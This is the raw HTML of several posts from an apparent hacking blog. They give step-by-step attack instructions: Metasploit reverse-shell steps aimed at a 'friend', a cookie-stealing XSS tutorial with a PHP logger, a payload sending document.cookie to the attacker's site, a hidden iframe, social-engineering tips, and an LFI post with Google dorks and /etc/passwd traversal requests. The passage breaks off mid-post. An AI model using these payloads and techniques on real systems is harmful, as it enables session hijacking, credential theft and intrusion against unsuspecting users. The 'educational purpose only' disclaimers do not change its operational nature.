<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">so type:<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">msf>set
payload windows/metxxxxx/xxx_tcp<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">then set LHOST
as your local ip<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><br /></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">then type:<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">msf>exploit<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><br /></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">you will be shown a url or address with port
number..give it to ur friend <o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">tada !<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">wait for the reverse connection.<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">---------------------------------------------------</span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><u><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">Warning:</span></u></b></span><span class="apple-style-span"><b><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"> Im not responsible for ur actions , just for
educational purpose only<o:p></o:p></span></b></span></div>
</div>sudhirhttp://www.blogger.com/profile/07016075449331701681noreply@blogger.com0tag:blogger.com,1999:blog-7651709861170417818.post-92040623320206011232011-10-25T00:56:00.000-07:002011-10-25T00:56:46.082-07:00Cookie Grabbing using XSS<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif";">XSS means
Cross-site Scripting </span></span><span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">is a type of</span></span><span class="apple-converted-space"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"> </span></span><span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">computer
security</span></span><span class="apple-converted-space"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"> </span></span><span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">vulnerability</span></span><span class="apple-converted-space"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"> </span></span><span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">typically found
in</span></span><span class="apple-converted-space"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"> </span></span><span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">Web applications</span></span><span class="apple-converted-space"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"> </span></span><span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">that enables
attackers to</span></span><span class="apple-converted-space"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"> </span></span><span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">inject</span></span><span class="apple-converted-space"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"> </span></span><span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">client-side
script</span></span><span class="apple-converted-space"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"> </span></span><span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">into</span></span><span class="apple-converted-space"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"> </span></span><span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">Web pages</span></span><span class="apple-converted-space"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"> </span></span><span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">viewed by other
users.<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">There are two types of XSS : Non-Persistent and
Persistent.<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">If u need to know about persistent and
non-persistent click </span></span><a href="http://mimmoo.wordpress.com/2011/06/19/xss-persistent-and-xss-non-persistent/"><span style="background: white; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">here</span></a><span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"> .<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">Now ..<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">Search for vulnerability in a site: its on you <o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">This is a simple example here:<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><sript>alert(“hi”);</script><o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><br /></span></b></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxKNxhKYArnEmHxd-Phm5kiLfUwBX3rtHY4cuRsnUlK_oX0Q1sO1uzMi7ZGPYnxpmGnQ2NVlkvLJZrFNCzlwts8fW9JnX2NDV5FSotA5xMh5ApV7VrTmCXCAvSMO_M2MxxHf7XdClmlec/s1600/x1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="265" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxKNxhKYArnEmHxd-Phm5kiLfUwBX3rtHY4cuRsnUlK_oX0Q1sO1uzMi7ZGPYnxpmGnQ2NVlkvLJZrFNCzlwts8fW9JnX2NDV5FSotA5xMh5ApV7VrTmCXCAvSMO_M2MxxHf7XdClmlec/s640/x1.JPG" width="640" /></a></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="Apple-style-span" style="font-family: Arial, sans-serif;"><br /></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif";">Make sure
that you have a site where the cookie needs to be uploded..<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif";">(Where a
link has to be sent and script executes )<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">Upload the below php script in your site ex:1.php<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><?php<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><br /></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">$cookie=$_GET[‘cookie’];<span> </span>//storing cookies in a variable called
$cookie.<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">$file=fopen(“cookies.txt”,”a”);<span> </span>//opening a file called cookies.txt with
append mode.<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">fwrite($file,$cookie.”\n\n\n);<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">fclose($file);<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">?><o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><br /></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">Save it as “ <b>1.php
</b>“ <o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><br /></span></span></div>
<div style="border-bottom: solid windowtext 1.0pt; border: none; mso-border-bottom-alt: solid windowtext .75pt; mso-element: para-border-div; padding: 0in 0in 1.0pt 0in;">
<div class="MsoNormal" style="border: none; mso-border-bottom-alt: solid windowtext .75pt; mso-padding-alt: 0in 0in 1.0pt 0in; padding: 0in; text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">Now the url
looks like : <b>www.your_site.com/some_folder/1.php</b><o:p></o:p></span></span></div>
<div class="MsoNormal" style="border: none; mso-border-bottom-alt: solid windowtext .75pt; mso-padding-alt: 0in 0in 1.0pt 0in; padding: 0in; text-align: justify;">
<span class="Apple-style-span" style="font-family: Arial, sans-serif; font-size: x-small;"><span class="Apple-style-span" style="line-height: 14px;"><b><br /></b></span></span></div>
<div class="MsoNormal" style="border: none; mso-border-bottom-alt: solid windowtext .75pt; mso-padding-alt: 0in 0in 1.0pt 0in; padding: 0in; text-align: justify;">
<span class="Apple-style-span" style="font-family: Arial, sans-serif; font-size: x-small;"><span class="Apple-style-span" style="line-height: 14px;">Find vuln in a site then put it like this below :</span></span></div>
<div class="MsoNormal" style="border: none; mso-border-bottom-alt: solid windowtext .75pt; mso-padding-alt: 0in 0in 1.0pt 0in; padding: 0in; text-align: justify;">
<span class="Apple-style-span" style="font-family: Arial, sans-serif; font-size: x-small;"><span class="Apple-style-span" style="line-height: 14px;"><br /></span></span></div>
<div class="MsoNormal" style="border: none; mso-border-bottom-alt: solid windowtext .75pt; mso-padding-alt: 0in 0in 1.0pt 0in; padding: 0in; text-align: justify;">
<b><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">http://some_vuln_site.com/somefolder/search.php?query=<script>document.location='http://Your_site.com/somefolder/1.php?cookie='.concat(escape(document.cookie));</script></span></b></div>
<div class="MsoNormal" style="border: none; mso-border-bottom-alt: solid windowtext .75pt; mso-padding-alt: 0in 0in 1.0pt 0in; padding: 0in; text-align: justify;">
<b><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><br /></span></b></div>
<div class="MsoNormal" style="border: none; mso-border-bottom-alt: solid windowtext .75pt; mso-padding-alt: 0in 0in 1.0pt 0in; padding: 0in; text-align: justify;">
<span class="Apple-style-span" style="background-color: white; font-family: Arial, sans-serif; font-size: 13px; line-height: 14px;"> </span><span class="Apple-style-span" style="background-color: white; font-family: Arial, sans-serif; font-size: 13px; line-height: 14px;">now send this link but,mostly people wont click
it because they find this url very suspicious.</span></div>
<div class="MsoNormal" style="border: none; mso-border-bottom-alt: solid windowtext .75pt; mso-padding-alt: 0in 0in 1.0pt 0in; padding: 0in; text-align: justify;">
<span class="Apple-style-span" style="background-color: white; font-family: Arial, sans-serif; font-size: 13px; line-height: 14px;">So u need to mask it</span></div>
<div class="MsoNormal" style="border: none; mso-border-bottom-alt: solid windowtext .75pt; mso-padding-alt: 0in 0in 1.0pt 0in; padding: 0in; text-align: justify;">
<span class="Apple-style-span" style="background-color: white; font-family: Arial, sans-serif; font-size: 13px; line-height: 14px;"><br /></span></div>
<div class="MsoNormal" style="border: none; mso-border-bottom-alt: solid windowtext .75pt; mso-padding-alt: 0in 0in 1.0pt 0in; padding: 0in; text-align: justify;">
<span class="Apple-style-span" style="background-color: white; font-family: Arial, sans-serif; font-size: 13px; line-height: 14px;">Ex:</span></div>
<div class="MsoNormal" style="border: none; mso-border-bottom-alt: solid windowtext .75pt; mso-padding-alt: 0in 0in 1.0pt 0in; padding: 0in; text-align: justify;">
<span class="Apple-style-span" style="font-family: Arial, sans-serif; font-size: x-small;"><span class="Apple-style-span" style="line-height: 14px;"><br /></span></span></div>
</div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><iframe</span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">src="http://some_vuln_site.com/somefolder/search.php?query=<script>document.location='http://Your_site.com/somefolder/1.php?cookie='.concat(escape(document.cookie));</script>"
width="1" heigth="1"></iframe><o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">**<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">Now put this script in file called <b>iclick.php </b>.<b><o:p></o:p></b></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">Now your url looks like <b>www.your_site.com/folder/iclick.php</b><o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><b><br /></b></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">Send this link to your friend or anyone else ask….(social
engineer) to click on this link..<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">Tats it the cookies will be stored in cookies.txt
file.<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">(download cookie editor addon and go on wat u
want to do).<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">-------------------------------------------------<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><u><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">Warning:</span></u></b></span><span class="apple-style-span"><b><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"> *** Im not reponsible for your actions. This is
just for educational purpose only.</span></b></span><span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"><o:p></o:p></span></span></div>
</div>sudhirhttp://www.blogger.com/profile/07016075449331701681noreply@blogger.com3tag:blogger.com,1999:blog-7651709861170417818.post-6163440543085293932011-10-18T11:35:00.000-07:002015-05-20T05:12:13.071-07:00LFI (Local File Inclusion)<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div style="border-bottom: solid #AAAAAA 1.0pt; border: none; mso-border-bottom-alt: solid #AAAAAA .75pt; mso-element: para-border-div; padding: 0in 0in 0in 0in;">
<h1 style="border: none; margin-bottom: 1.2pt; margin-left: 0in; margin-right: 0in; margin-top: 0in; mso-border-bottom-alt: solid #AAAAAA .75pt; mso-line-height-alt: 14.4pt; mso-padding-alt: 0in 0in 0in 0in; padding: 0in;">
<span class="Apple-style-span" style="font-family: Arial, sans-serif; font-size: large;"><span class="Apple-style-span" style="-webkit-text-size-adjust: none; background-color: white; font-family: Arial, Helvetica, 'Nimbus Sans L', sans-serif; line-height: 15px;">LFI bounce using chunked transfer encoding</span></span></h1>
</div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">Local File Inclusion (<i>also known as LFI</i>)
is the process of including files on a server through the web browser. This
vulnerability occurs when a page include is not properly sanitized, and allows
directory traversal characters to be injected.<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">The vuln. Code looks like :<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;"><br /></span></span></div>
<div style="background: #F9F9F9; border: dashed #2F6FAB 1.0pt; mso-border-alt: dashed #2F6FAB .75pt; mso-element: para-border-div; padding: 12.0pt 12.0pt 12.0pt 12.0pt;">
<pre style="background: #F9F9F9; border: none; line-height: 13.2pt; mso-border-alt: dashed #2F6FAB .75pt; mso-padding-alt: 12.0pt 12.0pt 12.0pt 12.0pt; padding: 0in;"><span style="background-attachment: initial; background-clip: initial; background-color: #f9f9f9; background-image: initial; background-origin: initial; color: black;"><?php<o:p></o:p></span></pre>
<pre style="background: #F9F9F9; border: none; line-height: 13.2pt; mso-border-alt: dashed #2F6FAB .75pt; mso-padding-alt: 12.0pt 12.0pt 12.0pt 12.0pt; padding: 0in;"><span style="background-attachment: initial; background-clip: initial; background-color: #f9f9f9; background-image: initial; background-origin: initial; color: black;"> $file = $_GET['file'];<o:p></o:p></span></pre>
<pre style="background: #F9F9F9; border: none; line-height: 13.2pt; mso-border-alt: dashed #2F6FAB .75pt; mso-padding-alt: 12.0pt 12.0pt 12.0pt 12.0pt; padding: 0in;"><span style="background-attachment: initial; background-clip: initial; background-color: #f9f9f9; background-image: initial; background-origin: initial; color: black;"> if(isset($file))<o:p></o:p></span></pre>
<pre style="background: #F9F9F9; border: none; line-height: 13.2pt; mso-border-alt: dashed #2F6FAB .75pt; mso-padding-alt: 12.0pt 12.0pt 12.0pt 12.0pt; padding: 0in;"><span style="background-attachment: initial; background-clip: initial; background-color: #f9f9f9; background-image: initial; background-origin: initial; color: black;"> {<o:p></o:p></span></pre>
<pre style="background: #F9F9F9; border: none; line-height: 13.2pt; mso-border-alt: dashed #2F6FAB .75pt; mso-padding-alt: 12.0pt 12.0pt 12.0pt 12.0pt; padding: 0in;"><span style="background-attachment: initial; background-clip: initial; background-color: #f9f9f9; background-image: initial; background-origin: initial; color: black;"> include("pages/$file");<o:p></o:p></span></pre>
<pre style="background: #F9F9F9; border: none; line-height: 13.2pt; mso-border-alt: dashed #2F6FAB .75pt; mso-padding-alt: 12.0pt 12.0pt 12.0pt 12.0pt; padding: 0in;"><span style="background-attachment: initial; background-clip: initial; background-color: #f9f9f9; background-image: initial; background-origin: initial; color: black;"> }<o:p></o:p></span></pre>
<pre style="background: #F9F9F9; border: none; line-height: 13.2pt; mso-border-alt: dashed #2F6FAB .75pt; mso-padding-alt: 12.0pt 12.0pt 12.0pt 12.0pt; padding: 0in;"><span style="background-attachment: initial; background-clip: initial; background-color: #f9f9f9; background-image: initial; background-origin: initial; color: black;"> else<o:p></o:p></span></pre>
<pre style="background: #F9F9F9; border: none; line-height: 13.2pt; mso-border-alt: dashed #2F6FAB .75pt; mso-padding-alt: 12.0pt 12.0pt 12.0pt 12.0pt; padding: 0in;"><span style="background-attachment: initial; background-clip: initial; background-color: #f9f9f9; background-image: initial; background-origin: initial; color: black;"> ……….<o:p></o:p></span></pre>
<pre style="background: #F9F9F9; border: none; line-height: 13.2pt; mso-border-alt: dashed #2F6FAB .75pt; mso-padding-alt: 12.0pt 12.0pt 12.0pt 12.0pt; padding: 0in;"><span style="background-attachment: initial; background-clip: initial; background-color: #f9f9f9; background-image: initial; background-origin: initial; color: black;"> …….. <o:p></o:p></span></pre>
<pre style="background: #F9F9F9; border: none; line-height: 13.2pt; mso-border-alt: dashed #2F6FAB .75pt; mso-padding-alt: 12.0pt 12.0pt 12.0pt 12.0pt; padding: 0in;"><span style="background-attachment: initial; background-clip: initial; background-color: #f9f9f9; background-image: initial; background-origin: initial; color: black;"> ?><o:p></o:p></span></pre>
</div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">Here from the code you can observe that its
taking or including the file from locally.<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">To get LFI vuln sites use dork like :: inurl:php?id=*.php<b><o:p></o:p></b></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">The “ *.php” means that any file name with
extension .php <o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">Ex: inrul:php?page=contact.php, contactus.ph etc.
<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">Or inurl:.php?file=somefile.php<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">(* im not Responsible for any of the actions for
what you do , Just Educational purpose only)<b><o:p></o:p></b></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;">There are
two ways : Manual and automated.<o:p></o:p></span></b></span><br />
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 115%;"><br /></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><u><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; color: black; font-family: Arial, sans-serif; font-size: 12pt; line-height: 115%;">MANUAL
way for LFI:<o:p></o:p></span></u></b></span></div>
<h1 style="text-indent: .5in;">
<span class="threadtitle"><u><span style="font-size: 11pt;">proc/self/environ method:<o:p></o:p></span></u></span></h1>
<h1 style="text-indent: .5in;">
<span class="threadtitle"><span style="font-size: 11pt;"> <span class="Apple-style-span" style="font-weight: normal;">check for vuln site same as above</span><o:p></o:p></span></span></h1>
<h1 style="text-indent: .5in;">
<span style="font-size: 11pt;"><span class="Apple-style-span" style="font-weight: normal;">then:</span><o:p></o:p></span></h1>
<h1 style="text-indent: .5in;">
<span style="font-family: Arial, sans-serif; font-size: 11pt;">Now lets check for etc/passwd to
see the if is Local File Inclusion vulnerable.Lets make a request :<br />
</span><span style="font-size: 11pt;"><br />
</span><span style="font-size: 11pt;">http://www.website.com/view.php?page=../etc/passwd</span><span style="font-size: 11pt;"><br />
<br /><span class="Apple-style-span" style="font-weight: normal;">
we got error and no etc/passwd file.</span><o:p></o:p></span></h1>
<h1>
<span style="font-family: Arial, sans-serif; font-size: 11pt;">*so we go more directories up<br />
<br />
</span><span style="font-family: Arial, sans-serif; font-size: 11pt;">http://www.website.com/view.php?page=../../etc/passwd<o:p></o:p></span></h1>
<h1>
<span style="font-family: Arial, sans-serif; font-size: 11pt;"><span class="Apple-style-span" style="font-weight: normal;">If you get like:</span><o:p></o:p></span></h1>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgakAFxZ3jWC2aFRbdSynnozY7b1aRI0uhHk2v0GQo0lEKVXydM_Ti9l7mSa44RhKUBc1xSb666TpVjhlBokY7KQzvENhjlbjkeHUDacrwbHWL0rtQMpALjT70kTtnJmvewd1BqaCj5plA/s1600/11.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="48" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgakAFxZ3jWC2aFRbdSynnozY7b1aRI0uhHk2v0GQo0lEKVXydM_Ti9l7mSa44RhKUBc1xSb666TpVjhlBokY7KQzvENhjlbjkeHUDacrwbHWL0rtQMpALjT70kTtnJmvewd1BqaCj5plA/s640/11.JPG" width="640" /></a></div>
